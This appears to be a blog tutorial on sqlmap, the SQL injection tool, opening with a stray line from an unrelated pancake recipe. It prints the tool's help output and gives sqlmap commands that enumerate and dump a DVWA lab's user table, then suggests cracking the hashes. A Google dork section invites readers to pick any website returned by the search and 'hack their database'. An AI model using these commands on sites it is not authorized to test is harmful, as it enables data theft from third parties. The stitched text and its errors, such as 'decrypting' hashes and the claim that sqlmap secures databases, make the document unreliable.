The Best Fluffy Pancakes recipe you will fall in love with. Full of tips and tricks to help you make the best pancakes.

SQL Map: tool 2001

SQL map is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection faults and hacking databases.

What Is SQL Injection?

SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database to extract confidencial data from it .

Hackers execute SQL injection attacks to retrieve information on web applications of Databases.

SQL Map tool has power to automate common SQL injection techniques like

  • Error based
  • Boolean based
  • Union based
  • Time delay

Classification Of SQL Injection

Open Web Application Security Project (OWASP) Organization prepared a list of top 10 system vulnerability . SQL Injection is the topmost in the list of threat by OWASP Organization. It breaks SQL injection in 4 category :

  • Classic SQL Injection
  • Blind or Inference SQL Injection
  • DBMS-specific SQL Injection
  • Compounded SQL Injection

Checking SQL Injection Vulnerabilities

SQL map enables us to try out the types of attacks that hackers implement on databases to extract important information. To make us check whether our system is protected by that attack or not.

The SQL map attemps an attack in a system in 6 categories. If one of this attacks succeeds you can fall in a serious problem and part of interface that present in your database need to be re- written to block the attack by hacker.

The types of attack that an SQL map attemps are following:

  • Boolean-based blind SQL injection
  • Time-based blind SQL injection
  • Error-based SQL injection
  • Union-based SQL injection
  • Stacked queries
  • Out-of-band attacks

Installtion Of SQL Map

We can download SQL map by cloning the Git repository in respective operating system ie. linux, Windows etc

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

SQL map installed In Linux using following commands

sudo apt-get install sqlmap

we can use In Kali linux SQL map are already installed in it.

We have Automatic SQL Injection tool in kali linux.By execute these commands in compiler we can get all details of it. 

root@kali:~# sqlmap -h
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.5#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior
    --flush-session     Flush session files for current target

  Miscellaneous:
    These options do not fit into any other category

    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with '-hh'

Automatic Sql Injection tool with API server in Kali Linux

root@kali:~# sqlmapapi -h
Usage: sqlmapapi [options]Options:  -h, --help            show this help message and exit  -s, --server          Run as a REST-JSON API server  -c, --client          Run as a REST-JSON API client  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")  --username=USERNAME   Basic authentication username (optional)  --password=PASSWORD   Basic authentication password (optional)

Working Of SQL Map

We can use SQL map in Windows, Kali linux, linux etc Operating system . In this tutorial we are using DVWA as testing site

1.Finding all Databases from a server
sqlmap -u “localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3″ –dbs
SQL Map
finding database from server 2.0
Finding Sever from database
Finding database from server
2. Banner grabbing
sqlmap -u “localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3″ -f
Banner Grabing
Banner Grabing
3.Finding out tables in particular database
sqlmap -u “localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3″ -D dvwa–tables
Finding tables in Database
Finding out tables in Particular Database
4.Dumping the whole table
sqlmap -u “localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3″ -D dvwa -T users  –dump
Dumping table
Dumping the Whole Table

So from here we get the whole database by using SQL injection . After saving the database We can decrypt the hashes and gain the desired data from the web application. In Web Penetration testing we can check various kind of vulnerability that can damage or lead to leakage of valuable data.

Google Dork

Google Dorks is very useful for information gathering purposes. This is the best way to reconnaissance is to target website when the target website doesn’t know about our reconnaissance. We do not have any vulnerable website or application where we can perform SQL injection  .So we need to take help of google dork. We will try to find the vulnerability in web application using “cat” parameter which will make our work efficient. According to Google it’s a way to pass information to servers through URL taking advantage of it hackers insert malicious SQL query into database. 

inurl:".php?cat=" inurl:"
Google Search

Google Provide us many website which uses cat parameter to show content of web pages. We can choose any website and add a single quote” ?cat=” parameter if in any case we get SQL syntax error then we know that website is Vulnerable to SQL injection vulnerability. 

http://testphp.vulnweb.com/listproducts.php?cat=1
SQL syntax error

We can get to identify SQL injection vulnerability by writting a 2 separate meta character. After that it is discovered that website is insecure and we can hack their database. 

http://testphp.vulnweb.com/listproducts.php?cat=1""
Identifying SQL injection vulnerability

Application Of SQL Map

1.SQL map automates the process of detecting and exploiting SQL injection by hackers

2. SQL map is open source tool for penetration testing for finding vulnerability of Web application to prevent it from attacks.

3. SQL map secures the databases made of Mysql, SQL, php etc.

I hope you get all the information regarding SQL map and become aware of this amazing tool.

I would like to share with you all official website link of SQL map

https://sqlmap.org/

https://thecyberdelta.com/proof-of-work/

Trending now

How to Know if Your Phone is Under A Malicious Control100% Beware of IP Addresses- How does INTERNET PROTOCOL works?Accomplish SOCIAL ENGINEERING (2022) Complete Guide2022HTTP REQUEST(HYPER TEXT TRANSFER PROTOCOL)